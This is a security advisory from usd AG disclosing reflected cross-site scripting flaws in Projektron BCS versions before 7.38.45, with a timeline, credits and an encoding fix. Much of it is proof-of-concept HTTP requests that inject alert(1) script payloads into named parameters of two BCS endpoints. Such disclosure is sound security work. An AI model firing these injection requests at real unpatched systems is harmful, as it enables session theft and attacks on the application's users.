usd-2018-0018 | Projektron BCS/ All versions before 7.38.45


Advisory ID: usd-2018-0018
CVE Number: N/A
Affected Product: Projektron BCS
Affected Version: All versions before 7.38.45
Vulnerability Type: Reflected XSS
Security Risk: High
Vendor URL: https://www.projektron.de/bcs/
Vendor Status: Fixed

 

Description

Reflected XSS attack (or non-persistent attack) occur when a malicious script is reflected off of a web application to the victim’s browser. The attack is typically delivered via email or a web site and activated through a link, which sends a request to a website with a vulnerability that enables execution of malicious scripts.

Proof of Concept (PoC)

The ‚editor‘, ‚oidnamefield‘ and ‚oidfield‘ parameters of /bcs/eventdeputydetail are vulnerable to XSS

GET /bcs/multioidselection/*/display?_pcc_typ_=JUserGroup%2520JOU%2520JUser&_pcc_mode_=Target&editor=TokenInput39390'%3balert(1)%2f%2f152&oidfield=eventdetail%2Csupporter%2Csupporter&oidnamefield=eventdetail%2Csupporter%2Csupporter_entitynames&transactionId=1503060134184-40619437911778866 HTTP/1.1

GET /bcs/multioidselection/*/display?_pcc_typ_=JUserGroup%2520JOU%2520JUser&_pcc_mode_=Target&editor=TokenInput&oidfield=eventdetail%2csupporter%2csupporter51042'%3balert(1)%2f%2f430&oidnamefield=eventdetail%2Csupporter%2Csupporter_entitynames&transactionId=1503060134184-40619437911778866 HTTP/1.1

GET /bcs/multioidselection/*/display?_pcc_typ_=JUserGroup%2520JOU%2520JUser&_pcc_mode_=Target&editor=TokenInput&oidfield=eventdetail%2Csupporter%2Csupporter&oidnamefield=eventdetail%2csupporter%2csupporter_entitynames14437'%3balert(1)%2f%2f761&transactionId=1503060134184-40619437911778866 HTTP/1.1

Second Proof of Concept

The ‚description‘, ‚InitialApplyButtonsOnError‘ and ‚HighlightedApplyButtonsOnError‘ parameters of /bcs/eventdeputydetail are vulnerable to XSS

GET /bcs/eventdeputydetail/main/edit?eventdetail%2C__componentTitleComposed=true&eventdetail%2Cformsubmitted=true&eventdetail%2CData_FirstOnPage=eventdetail&eventdetail%2Cdialog_group_visible_attributes=true&eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_name=true&eventdetail%2C%21attributetoggle_name=true&eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_appointmentUser=true&eventdetail%2C%21attributetoggle_appointmentUser=true&eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_appointmentStart=true&eventdetail%2C%21attributetoggle_appointmentStart=true&eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_appointmentEnd=true&eventdetail%2C%21attributetoggle_appointmentEnd=true&eventdetail%2C%21attributetoggle_eventDuration=true&eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_deputiesAndToInform=true&eventdetail%2C%21attributetoggle_deputiesAndToInform=true&eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_subtyp=true&eventdetail%2C%21attributetoggle_subtyp=true&eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_state=true&eventdetail%2C%21attributetoggle_state=true&eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_workloadHandling=true&eventdetail%2C%21attributetoggle_workloadHandling=true&eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_description=true&eventdetail%2C%21attributetoggle_description=true&eventdetail%2Csettings_dialog_opened=false&eventdetail%2Cfilters_has_unapplied_changes=false&eventdetail%2CData_FirstOnPage=eventdetail&eventdetail%2Cname%2Cname=Stellvertretung&eventdetail%2CappointmentStart%2CappointmentStart_date%2CappointmentStart_date=17.08.2017&eventdetail%2CappointmentStart%2CappointmentStart=y&eventdetail%2CappointmentEnd%2CappointmentEnd_date%2CappointmentEnd_date=17.08.2017&eventdetail%2CappointmentEnd%2CappointmentEnd=y&eventdetail%2CdeputiesAndToInform%2CdeputiesAndToInform=%7B%22JAppointmentRef%22%3A%5B%7B%22relatedOid%22%3A%221051012826131_JUser%22%2C%22token_id%22%3A%221051012826131_JUser%22%2C%22is_new%22%3A%22true%22%2C%22eventReferenceTyp%22%3A%22Guest%22%7D%5D%7D&eventdetail%2CdeputiesAndToInform%2CdeputiesAndToInform_search=&eventdetail%2CdeputiesAndToInform%2CdeputiesAndToInform_editortype=TokenInput&eventdetail%2Cdescription%2Cdescription=rv1x4%3cscript%3ealert(1)%3c%2fscript%3eq6ayqxxghok&eventdetail%2Coid=NEW_CREATED_OBJECT_JAppointment&eventdetail%2CData_SuppressLastHorizontalLine=false&eventdetail%2Cedit_form_data_submitted=true&new_entity_init_attributes%2Ctyp=JAppointment&new_entity_init_attributes%2CappointmentEnd=2017-08-17T00%3A00%3A00%2B02%3A00&oid=1502784743839_JAppointment&action%2CSaveAction%2Ceventdetail=0&new_entity_init_attributes%2CappointmentStart=2017-08-17T00%3A00%3A00%2B02%3A00&pageentity_is_new=true&user=Entwickler2&new_entity_init_attributes%2Csubtyp=deputy&pagetimestamp=1502976689686&transactionId=1502976689702-6759310571525836&new_entity_init_attributes%2CappointmentUser=1051012826131_JUser&new_entity_init_attributes%2Coid=1502784743839_JAppointment&ConfirmDiscardChangesDialog%2CInitialApplyButtonsOnError=eventdetail%2CApply&PageForm%2CformChangedIndicator=true&PageForm%2CHighlightedApplyButtonsOnError=eventdetail%2CApply&eventdetail%2CApply=eventdetail%2CApply&submitButtonPressed=eventdetail%2CApply HTTP/1.1

GET /bcs/eventdeputydetail/main/edit?eventdetail%2C__componentTitleComposed=true&eventdetail%2Cformsubmitted=true&eventdetail%2CData_FirstOnPage=eventdetail&eventdetail%2Cdialog_group_visible_attributes=true&eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_name=true&eventdetail%2C%21attributetoggle_name=true&eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_appointmentUser=true&eventdetail%2C%21attributetoggle_appointmentUser=true&eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_appointmentStart=true&eventdetail%2C%21attributetoggle_appointmentStart=true&eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_appointmentEnd=true&eventdetail%2C%21attributetoggle_appointmentEnd=true&eventdetail%2C%21attributetoggle_eventDuration=true&eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_deputiesAndToInform=true&eventdetail%2C%21attributetoggle_deputiesAndToInform=true&eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_subtyp=true&eventdetail%2C%21attributetoggle_subtyp=true&eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_state=true&eventdetail%2C%21attributetoggle_state=true&eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_workloadHandling=true&eventdetail%2C%21attributetoggle_workloadHandling=true&eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_description=true&eventdetail%2C%21attributetoggle_description=true&eventdetail%2Csettings_dialog_opened=false&eventdetail%2Cfilters_has_unapplied_changes=false&eventdetail%2CData_FirstOnPage=eventdetail&eventdetail%2Cname%2Cname=Stellvertretung&eventdetail%2CappointmentStart%2CappointmentStart_date%2CappointmentStart_date=17.08.2017&eventdetail%2CappointmentStart%2CappointmentStart=y&eventdetail%2CappointmentEnd%2CappointmentEnd_date%2CappointmentEnd_date=17.08.2017&eventdetail%2CappointmentEnd%2CappointmentEnd=y&eventdetail%2CdeputiesAndToInform%2CdeputiesAndToInform=%7B%22JAppointmentRef%22%3A%5B%7B%22relatedOid%22%3A%221051012826131_JUser%22%2C%22token_id%22%3A%221051012826131_JUser%22%2C%22is_new%22%3A%22true%22%2C%22eventReferenceTyp%22%3A%22Guest%22%7D%5D%7D&eventdetail%2CdeputiesAndToInform%2CdeputiesAndToInform_search=&eventdetail%2CdeputiesAndToInform%2CdeputiesAndToInform_editortype=TokenInput&eventdetail%2Cdescription%2Cdescription=&eventdetail%2Coid=NEW_CREATED_OBJECT_JAppointment&eventdetail%2CData_SuppressLastHorizontalLine=false&eventdetail%2Cedit_form_data_submitted=true&new_entity_init_attributes%2Ctyp=JAppointment&new_entity_init_attributes%2CappointmentEnd=2017-08-17T00%3A00%3A00%2B02%3A00&oid=1502784743839_JAppointment&action%2CSaveAction%2Ceventdetail=0&new_entity_init_attributes%2CappointmentStart=2017-08-17T00%3A00%3A00%2B02%3A00&pageentity_is_new=true&user=Entwickler2&new_entity_init_attributes%2Csubtyp=deputy&pagetimestamp=1502976689686&transactionId=1502976689702-6759310571525836&new_entity_init_attributes%2CappointmentUser=1051012826131_JUser&new_entity_init_attributes%2Coid=1502784743839_JAppointment&ConfirmDiscardChangesDialog%2CInitialApplyButtonsOnError=eventdetail%2cApply76429'%3balert(1)%2f%2f411vxq6nz&PageForm%2CformChangedIndicator=true&PageForm%2CHighlightedApplyButtonsOnError=eventdetail%2CApply&eventdetail%2CApply=eventdetail%2CApply&submitButtonPressed=eventdetail%2CApply HTTP/1.1

GET /bcs/eventdeputydetail/main/edit?eventdetail%2C__componentTitleComposed=true&eventdetail%2Cformsubmitted=true&eventdetail%2CData_FirstOnPage=eventdetail&eventdetail%2Cdialog_group_visible_attributes=true&eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_name=true&eventdetail%2C%21attributetoggle_name=true&eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_appointmentUser=true&eventdetail%2C%21attributetoggle_appointmentUser=true&eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_appointmentStart=true&eventdetail%2C%21attributetoggle_appointmentStart=true&eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_appointmentEnd=true&eventdetail%2C%21attributetoggle_appointmentEnd=true&eventdetail%2C%21attributetoggle_eventDuration=true&eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_deputiesAndToInform=true&eventdetail%2C%21attributetoggle_deputiesAndToInform=true&eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_subtyp=true&eventdetail%2C%21attributetoggle_subtyp=true&eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_state=true&eventdetail%2C%21attributetoggle_state=true&eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_workloadHandling=true&eventdetail%2C%21attributetoggle_workloadHandling=true&eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_description=true&eventdetail%2C%21attributetoggle_description=true&eventdetail%2Csettings_dialog_opened=false&eventdetail%2Cfilters_has_unapplied_changes=false&eventdetail%2CData_FirstOnPage=eventdetail&eventdetail%2Cname%2Cname=Stellvertretung&eventdetail%2CappointmentStart%2CappointmentStart_date%2CappointmentStart_date=17.08.2017&eventdetail%2CappointmentStart%2CappointmentStart=y&eventdetail%2CappointmentEnd%2CappointmentEnd_date%2CappointmentEnd_date=17.08.2017&eventdetail%2CappointmentEnd%2CappointmentEnd=y&eventdetail%2CdeputiesAndToInform%2CdeputiesAndToInform=%7B%22JAppointmentRef%22%3A%5B%7B%22relatedOid%22%3A%221051012826131_JUser%22%2C%22token_id%22%3A%221051012826131_JUser%22%2C%22is_new%22%3A%22true%22%2C%22eventReferenceTyp%22%3A%22Guest%22%7D%5D%7D&eventdetail%2CdeputiesAndToInform%2CdeputiesAndToInform_search=&eventdetail%2CdeputiesAndToInform%2CdeputiesAndToInform_editortype=TokenInput&eventdetail%2Cdescription%2Cdescription=&eventdetail%2Coid=NEW_CREATED_OBJECT_JAppointment&eventdetail%2CData_SuppressLastHorizontalLine=false&eventdetail%2Cedit_form_data_submitted=true&new_entity_init_attributes%2Ctyp=JAppointment&new_entity_init_attributes%2CappointmentEnd=2017-08-17T00%3A00%3A00%2B02%3A00&oid=1502784743839_JAppointment&action%2CSaveAction%2Ceventdetail=0&new_entity_init_attributes%2CappointmentStart=2017-08-17T00%3A00%3A00%2B02%3A00&pageentity_is_new=true&user=Entwickler2&new_entity_init_attributes%2Csubtyp=deputy&pagetimestamp=1502976689686&transactionId=1502976689702-6759310571525836&new_entity_init_attributes%2CappointmentUser=1051012826131_JUser&new_entity_init_attributes%2Coid=1502784743839_JAppointment&ConfirmDiscardChangesDialog%2CInitialApplyButtonsOnError=eventdetail%2CApply&PageForm%2CformChangedIndicator=true&PageForm%2CHighlightedApplyButtonsOnError=eventdetail%2cApply11494'%3balert(1)%2f%2f133etp0ac&eventdetail%2CApply=eventdetail%2CApply&submitButtonPressed=eventdetail%2CApply HTTP/1.1

GET /bcs/eventdeputydetail/main/edit?eventdetail%2C__componentTitleComposed=true&eventdetail%2Cformsubmitted=true&eventdetail%2CData_FirstOnPage=eventdetail&eventdetail%2Cdialog_group_visible_attributes=true&eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_name=true&eventdetail%2C%21attributetoggle_name=true&eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_appointmentUser=true&eventdetail%2C%21attributetoggle_appointmentUser=true&eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_appointmentStart=true&eventdetail%2C%21attributetoggle_appointmentStart=true&eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_appointmentEnd=true&eventdetail%2C%21attributetoggle_appointmentEnd=true&eventdetail%2C%21attributetoggle_eventDuration=true&eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_deputiesAndToInform=true&eventdetail%2C%21attributetoggle_deputiesAndToInform=true&eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_subtyp=true&eventdetail%2C%21attributetoggle_subtyp=true&eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_state=true&eventdetail%2C%21attributetoggle_state=true&eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_workloadHandling=true&eventdetail%2C%21attributetoggle_workloadHandling=true&eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_description=true&eventdetail%2C%21attributetoggle_description=true&eventdetail%2Csettings_dialog_opened=false&eventdetail%2Cfilters_has_unapplied_changes=false&eventdetail%2CData_FirstOnPage=eventdetail&eventdetail%2Cname%2Cname=Stellvertretung&eventdetail%2CappointmentStart%2CappointmentStart_date%2CappointmentStart_date=17.08.2017&eventdetail%2CappointmentStart%2CappointmentStart=y&eventdetail%2CappointmentEnd%2CappointmentEnd_date%2CappointmentEnd_date=17.08.2017&eventdetail%2CappointmentEnd%2CappointmentEnd=y&eventdetail%2CdeputiesAndToInform%2CdeputiesAndToInform=%7B%22JAppointmentRef%22%3A%5B%7B%22relatedOid%22%3A%221051012826131_JUser%22%2C%22token_id%22%3A%221051012826131_JUser%22%2C%22is_new%22%3A%22true%22%2C%22eventReferenceTyp%22%3A%22Guest%22%7D%5D%7D&eventdetail%2CdeputiesAndToInform%2CdeputiesAndToInform_search=&eventdetail%2CdeputiesAndToInform%2CdeputiesAndToInform_editortype=TokenInput&eventdetail%2Cdescription%2Cdescription=rv1x4%3cscript%3ealert(1)%3c%2fscript%3eq6ayqxxghok&eventdetail%2Coid=NEW_CREATED_OBJECT_JAppointment&eventdetail%2CData_SuppressLastHorizontalLine=false&eventdetail%2Cedit_form_data_submitted=true&new_entity_init_attributes%2Ctyp=JAppointment&new_entity_init_attributes%2CappointmentEnd=2017-08-17T00%3A00%3A00%2B02%3A00&oid=1502784743839_JAppointment&action%2CSaveAction%2Ceventdetail=0&new_entity_init_attributes%2CappointmentStart=2017-08-17T00%3A00%3A00%2B02%3A00&pageentity_is_new=true&user=Entwickler2&new_entity_init_attributes%2Csubtyp=deputy&pagetimestamp=1502976689686&transactionId=1502976689702-6759310571525836&new_entity_init_attributes%2CappointmentUser=1051012826131_JUser&new_entity_init_attributes%2Coid=1502784743839_JAppointment&ConfirmDiscardChangesDialog%2CInitialApplyButtonsOnError=eventdetail%2CApply&PageForm%2CformChangedIndicator=true&PageForm%2CHighlightedApplyButtonsOnError=eventdetail%2CApply&eventdetail%2CApply=eventdetail%2CApply&submitButtonPressed=eventdetail%2CApply HTTP/1.1

Fix

Make sure to encode the user supplied input.

Timeline

  • 2017-09-15 – First contact request
  • 2017-09-19 Vendor accepts all reported issues
  • 2018-04-06 Vendor provides a new release 7.38.45
  • 2018-06-06 Security advisory released

Credits

These security vulnerabilities were found by Stefan Schmer of usd AG.